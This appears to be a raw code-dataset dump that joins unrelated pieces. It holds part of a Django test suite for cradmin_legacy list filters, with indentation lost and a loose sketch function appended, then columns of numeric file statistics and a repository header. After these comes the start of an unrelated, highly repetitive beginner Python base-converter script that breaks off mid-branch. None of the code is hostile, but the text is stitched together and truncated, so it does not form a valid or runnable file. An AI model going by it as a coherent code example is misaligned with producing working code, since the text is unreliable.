testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_last_seven_days_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['last_seven_days'])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 3))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 10, 12, 30)):
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_this_week_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_week'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 11, 29))
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 7))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 1, 12, 30)):
self.assertFalse(
testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_this_week_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_week'])
start_of_week = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 11, 30))
end_of_week = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 6, 23))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 1, 12, 30)):
self.assertEqual(
{start_of_week, end_of_week},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_this_month_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_month'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 11, 29))
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2016, 1, 1))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 7, 12, 30)):
self.assertFalse(
testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_this_month_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_month'])
start_of_month = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 1))
middle_of_month = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 24))
end_of_month = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 31, 23))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 7, 12, 30)):
self.assertEqual(
{start_of_month, middle_of_month, end_of_month},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_this_year_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_year'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2014, 12, 31))
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2016, 1, 1))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 24)):
self.assertFalse(
testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_this_year_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_year'])
start_of_year = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 1))
middle_of_year = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 6, 1))
end_of_year = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 31, 23))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 24)):
self.assertEqual(
{start_of_year, middle_of_year, end_of_year},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
class TestNullDateTime(TestCase):
def test_is_null(self):
testfilter = listfilter.django.single.select.NullDateTime(slug='mynulldatetimefield')
testfilter.set_values(values=['is_null'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mynulldatetimefield=datetimeutils.default_timezone_datetime(2014, 12, 31))
isnull = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mynulldatetimefield=None)
self.assertEqual(
{isnull},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_is_not_null(self):
testfilter = listfilter.django.single.select.NullDateTime(slug='mynulldatetimefield')
testfilter.set_values(values=['is_not_null'])
isnotnull = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mynulldatetimefield=datetimeutils.default_timezone_datetime(2014, 12, 31))
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mynulldatetimefield=None)
self.assertEqual(
{isnotnull},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
class TestOrderBy(TestCase):
def test_invalid_value(self):
class OrderByFilter(listfilter.django.single.select.AbstractOrderBy):
def get_ordering_options(self):
return []
testfilter = OrderByFilter(slug='orderby')
testfilter.set_values(values=['invalidstuff'])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel')
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_no_value_defaults_to_the_empty_value(self):
class OrderByFilter(listfilter.django.single.select.AbstractOrderBy):
def get_ordering_options(self):
return [
('', {
'label': 'mylabel',
'order_by': ['mydatetimefield'],
}),
]
testfilter = OrderByFilter(slug='orderby')
testfilter.set_values(values=[])
testitem2 = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2016, 1, 2))
testitem1 = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 2))
self.assertEqual(
[testitem1, testitem2],
list(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_nondefault_value(self):
class OrderByFilter(listfilter.django.single.select.AbstractOrderBy):
def get_ordering_options(self):
return [
('', {
'label': 'asc',
'order_by': ['mydatetimefield'],
}),
('desc', {
'label': 'desc',
'order_by': ['-mydatetimefield'],
}),
]
testfilter = OrderByFilter(slug='orderby')
testfilter.set_values(values=['desc'])
testitem2 = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2016, 1, 2))
testitem1 = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 2))
self.assertEqual(
[testitem2, testitem1],
list(testfilter.filter(queryobject=FilterTestModel.objects.all())))
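def _apply_ordering_sketch(queryset, ordering_options, selected_value):
    # Hedged sketch of the mechanism the TestOrderBy cases above exercise;
    # this is an illustration, not cradmin's implementation. Each ordering
    # option maps a value ('' being the default) to a dict with a 'label'
    # and an 'order_by' list; an unknown value leaves the queryset untouched,
    # matching test_invalid_value.
    option = dict(ordering_options).get(selected_value)
    if option is None:
        return queryset
    return queryset.order_by(*option['order_by'])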
| 55.099707
| 111
| 0.665123
| 1,716
| 18,789
| 7.082168
| 0.081585
| 0.071094
| 0.098741
| 0.104419
| 0.928577
| 0.923969
| 0.921007
| 0.914918
| 0.883486
| 0.878384
| 0
| 0.021927
| 0.235404
| 18,789
| 340
| 112
| 55.261765
| 0.824029
| 0
| 0
| 0.731788
| 0
| 0
| 0.197403
| 0.161211
| 0
| 0
| 0
| 0
| 0.086093
| 1
| 0.096026
| false
| 0
| 0.02649
| 0.009934
| 0.15894
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c46c3de0b7231d58a348ef921880f2a3b454ce7
| 64,803
|
py
|
Python
|
Base Converter/main.py
|
mrif449/simple-python-projects
|
1d57b861f2d54568ebab955722f782a351a57f21
|
[
"MIT"
] | null | null | null |
Base Converter/main.py
|
mrif449/simple-python-projects
|
1d57b861f2d54568ebab955722f782a351a57f21
|
[
"MIT"
] | null | null | null |
Base Converter/main.py
|
mrif449/simple-python-projects
|
1d57b861f2d54568ebab955722f782a351a57f21
|
[
"MIT"
] | null | null | null |
print("Welcome to Base Converter Calculator!!!")
print("You can select your calculation mode by entering the serial number, or write 'close' stop calculating.")
print()
print("Note: You can also close the whole program by pressing Enter after closing calculation menu or manually.")
#Options:
print("Basic Bases:")
print("Decimal = 10")
print("Binary = 2")
print("Octal = 8")
print("Hexa-Decimal = 16")
print("...............................")
print("Let's Start...")
print("Press Enter to Start...")
inp = input("or Anything to Stop...")
while True:
if inp == "":
#Selecting Calculation Mode:
#command = (input("Select your calculation mode (1-14): "))
i_base = int(input("Enter the input Base: "))
o_base = int(input("Enter the output Base: "))
#Decimal to Binary
if i_base == 10 and o_base == 2:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%2)
temp = temp // 2
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Decimal to Octal
elif i_base == 10 and o_base == 8:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%8)
temp = temp // 8
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Decimal to Hexa-Decimal
elif i_base == 10 and o_base == 16:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%16
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
else:
string += str(temp%16)
temp = temp // 16
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Binary to Decimal
elif i_base == 2 and o_base == 10:
number = int(input("Enter the Binary number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(2**temp_list[x]))
print("=============================")
print("Your result is",sum)
print("=============================")
#Binary to Octal
elif i_base == 2 and o_base == 8:
number = int(input("Enter the Binary number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(2**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
string += str(temp%8)
temp = temp // 8
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Binary to Hexa-Decimal
elif i_base == 2 and o_base == 16:
number = int(input("Enter the Binary number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(2**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
temp2 = temp%16
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
else:
string += str(temp%16)
temp = temp // 16
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Octal to Decimal
elif i_base == 8 and o_base == 10:
number = int(input("Enter the Octal number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(8**temp_list[x]))
print("=============================")
print("Your result is",sum)
print("=============================")
#Octal to Binary
elif i_base == 8 and o_base == 2:
number = int(input("Enter the Octal number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(8**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
string += str(temp%2)
temp = temp // 2
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Octal to Hexa-Decimal
elif i_base == 8 and o_base == 16:
number = int(input("Enter the Octal number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(8**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
temp2 = temp%16
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
else:
string += str(temp%16)
temp = temp // 16
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Hexa-Decimal to Decimal
elif i_base == 16 and o_base == 10:
string = input("Enter the Hexa-Decimal Number: ")
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
if b.upper() == "A":
string_list.append(10)
elif b.upper() == "B":
string_list.append(11)
elif b.upper() == "C":
string_list.append(12)
elif b.upper() == "D":
string_list.append(13)
elif b.upper() == "E":
string_list.append(14)
elif b.upper() == "F":
string_list.append(15)
else:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(16**temp_list[x]))
print("=============================")
print("Your result is",sum)
print("=============================")
#Hexa-Decimal to Binary
elif i_base == 16 and o_base == 2:
string = input("Enter the Hexa-Decimal Number: ")
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
if b.upper() == "A":
string_list.append(10)
elif b.upper() == "B":
string_list.append(11)
elif b.upper() == "C":
string_list.append(12)
elif b.upper() == "D":
string_list.append(13)
elif b.upper() == "E":
string_list.append(14)
elif b.upper() == "F":
string_list.append(15)
else:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(16**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
string += str(temp%2)
temp = temp // 2
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Hexa-Decimal to Octal
elif i_base == 16 and o_base == 8:
string = input("Enter the Hexa-Decimal Number: ")
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
if b.upper() == "A":
string_list.append(10)
elif b.upper() == "B":
string_list.append(11)
elif b.upper() == "C":
string_list.append(12)
elif b.upper() == "D":
string_list.append(13)
elif b.upper() == "E":
string_list.append(14)
elif b.upper() == "F":
string_list.append(15)
else:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(16**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
string += str(temp%8)
temp = temp // 8
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Decimal to Other Base:
elif i_base == 10:
if o_base == 3:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%3)
temp = temp // 3
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 4:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%4)
temp = temp // 4
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 5:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%5)
temp = temp // 5
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 6:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%6)
temp = temp // 6
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 7:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%7)
temp = temp // 7
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 9:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%9)
temp = temp // 9
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 11:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%11
if temp2 == 10:
string += "A"
else:
string += str(temp%11)
temp = temp // 11
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 12:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%12
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
else:
string += str(temp%12)
temp = temp // 12
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 13:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%13
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
else:
string += str(temp%13)
temp = temp // 13
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 14:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%14
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
else:
string += str(temp%14)
temp = temp // 14
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 15:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%15
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
else:
string += str(temp%15)
temp = temp // 15
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 17:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%17
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
else:
string += str(temp%17)
temp = temp // 17
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 18:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%18
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
else:
string += str(temp%18)
temp = temp // 18
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 19:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%19
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
else:
string += str(temp%19)
temp = temp // 19
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 20:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%20
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
else:
string += str(temp%20)
temp = temp // 20
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 21:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%21
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
else:
string += str(temp%21)
temp = temp // 21
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 22:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%22
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
else:
string += str(temp%22)
temp = temp // 22
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 23:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%23
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
else:
string += str(temp%23)
temp = temp // 23
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 24:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%24
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
else:
string += str(temp%24)
temp = temp // 24
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 25:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%25
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
else:
string += str(temp%25)
temp = temp // 25
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 26:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%26
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
else:
string += str(temp%26)
temp = temp // 26
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 27:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%27
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
else:
string += str(temp%27)
temp = temp // 27
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 28:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%28
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
else:
string += str(temp%28)
temp = temp // 28
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 29:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%29
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
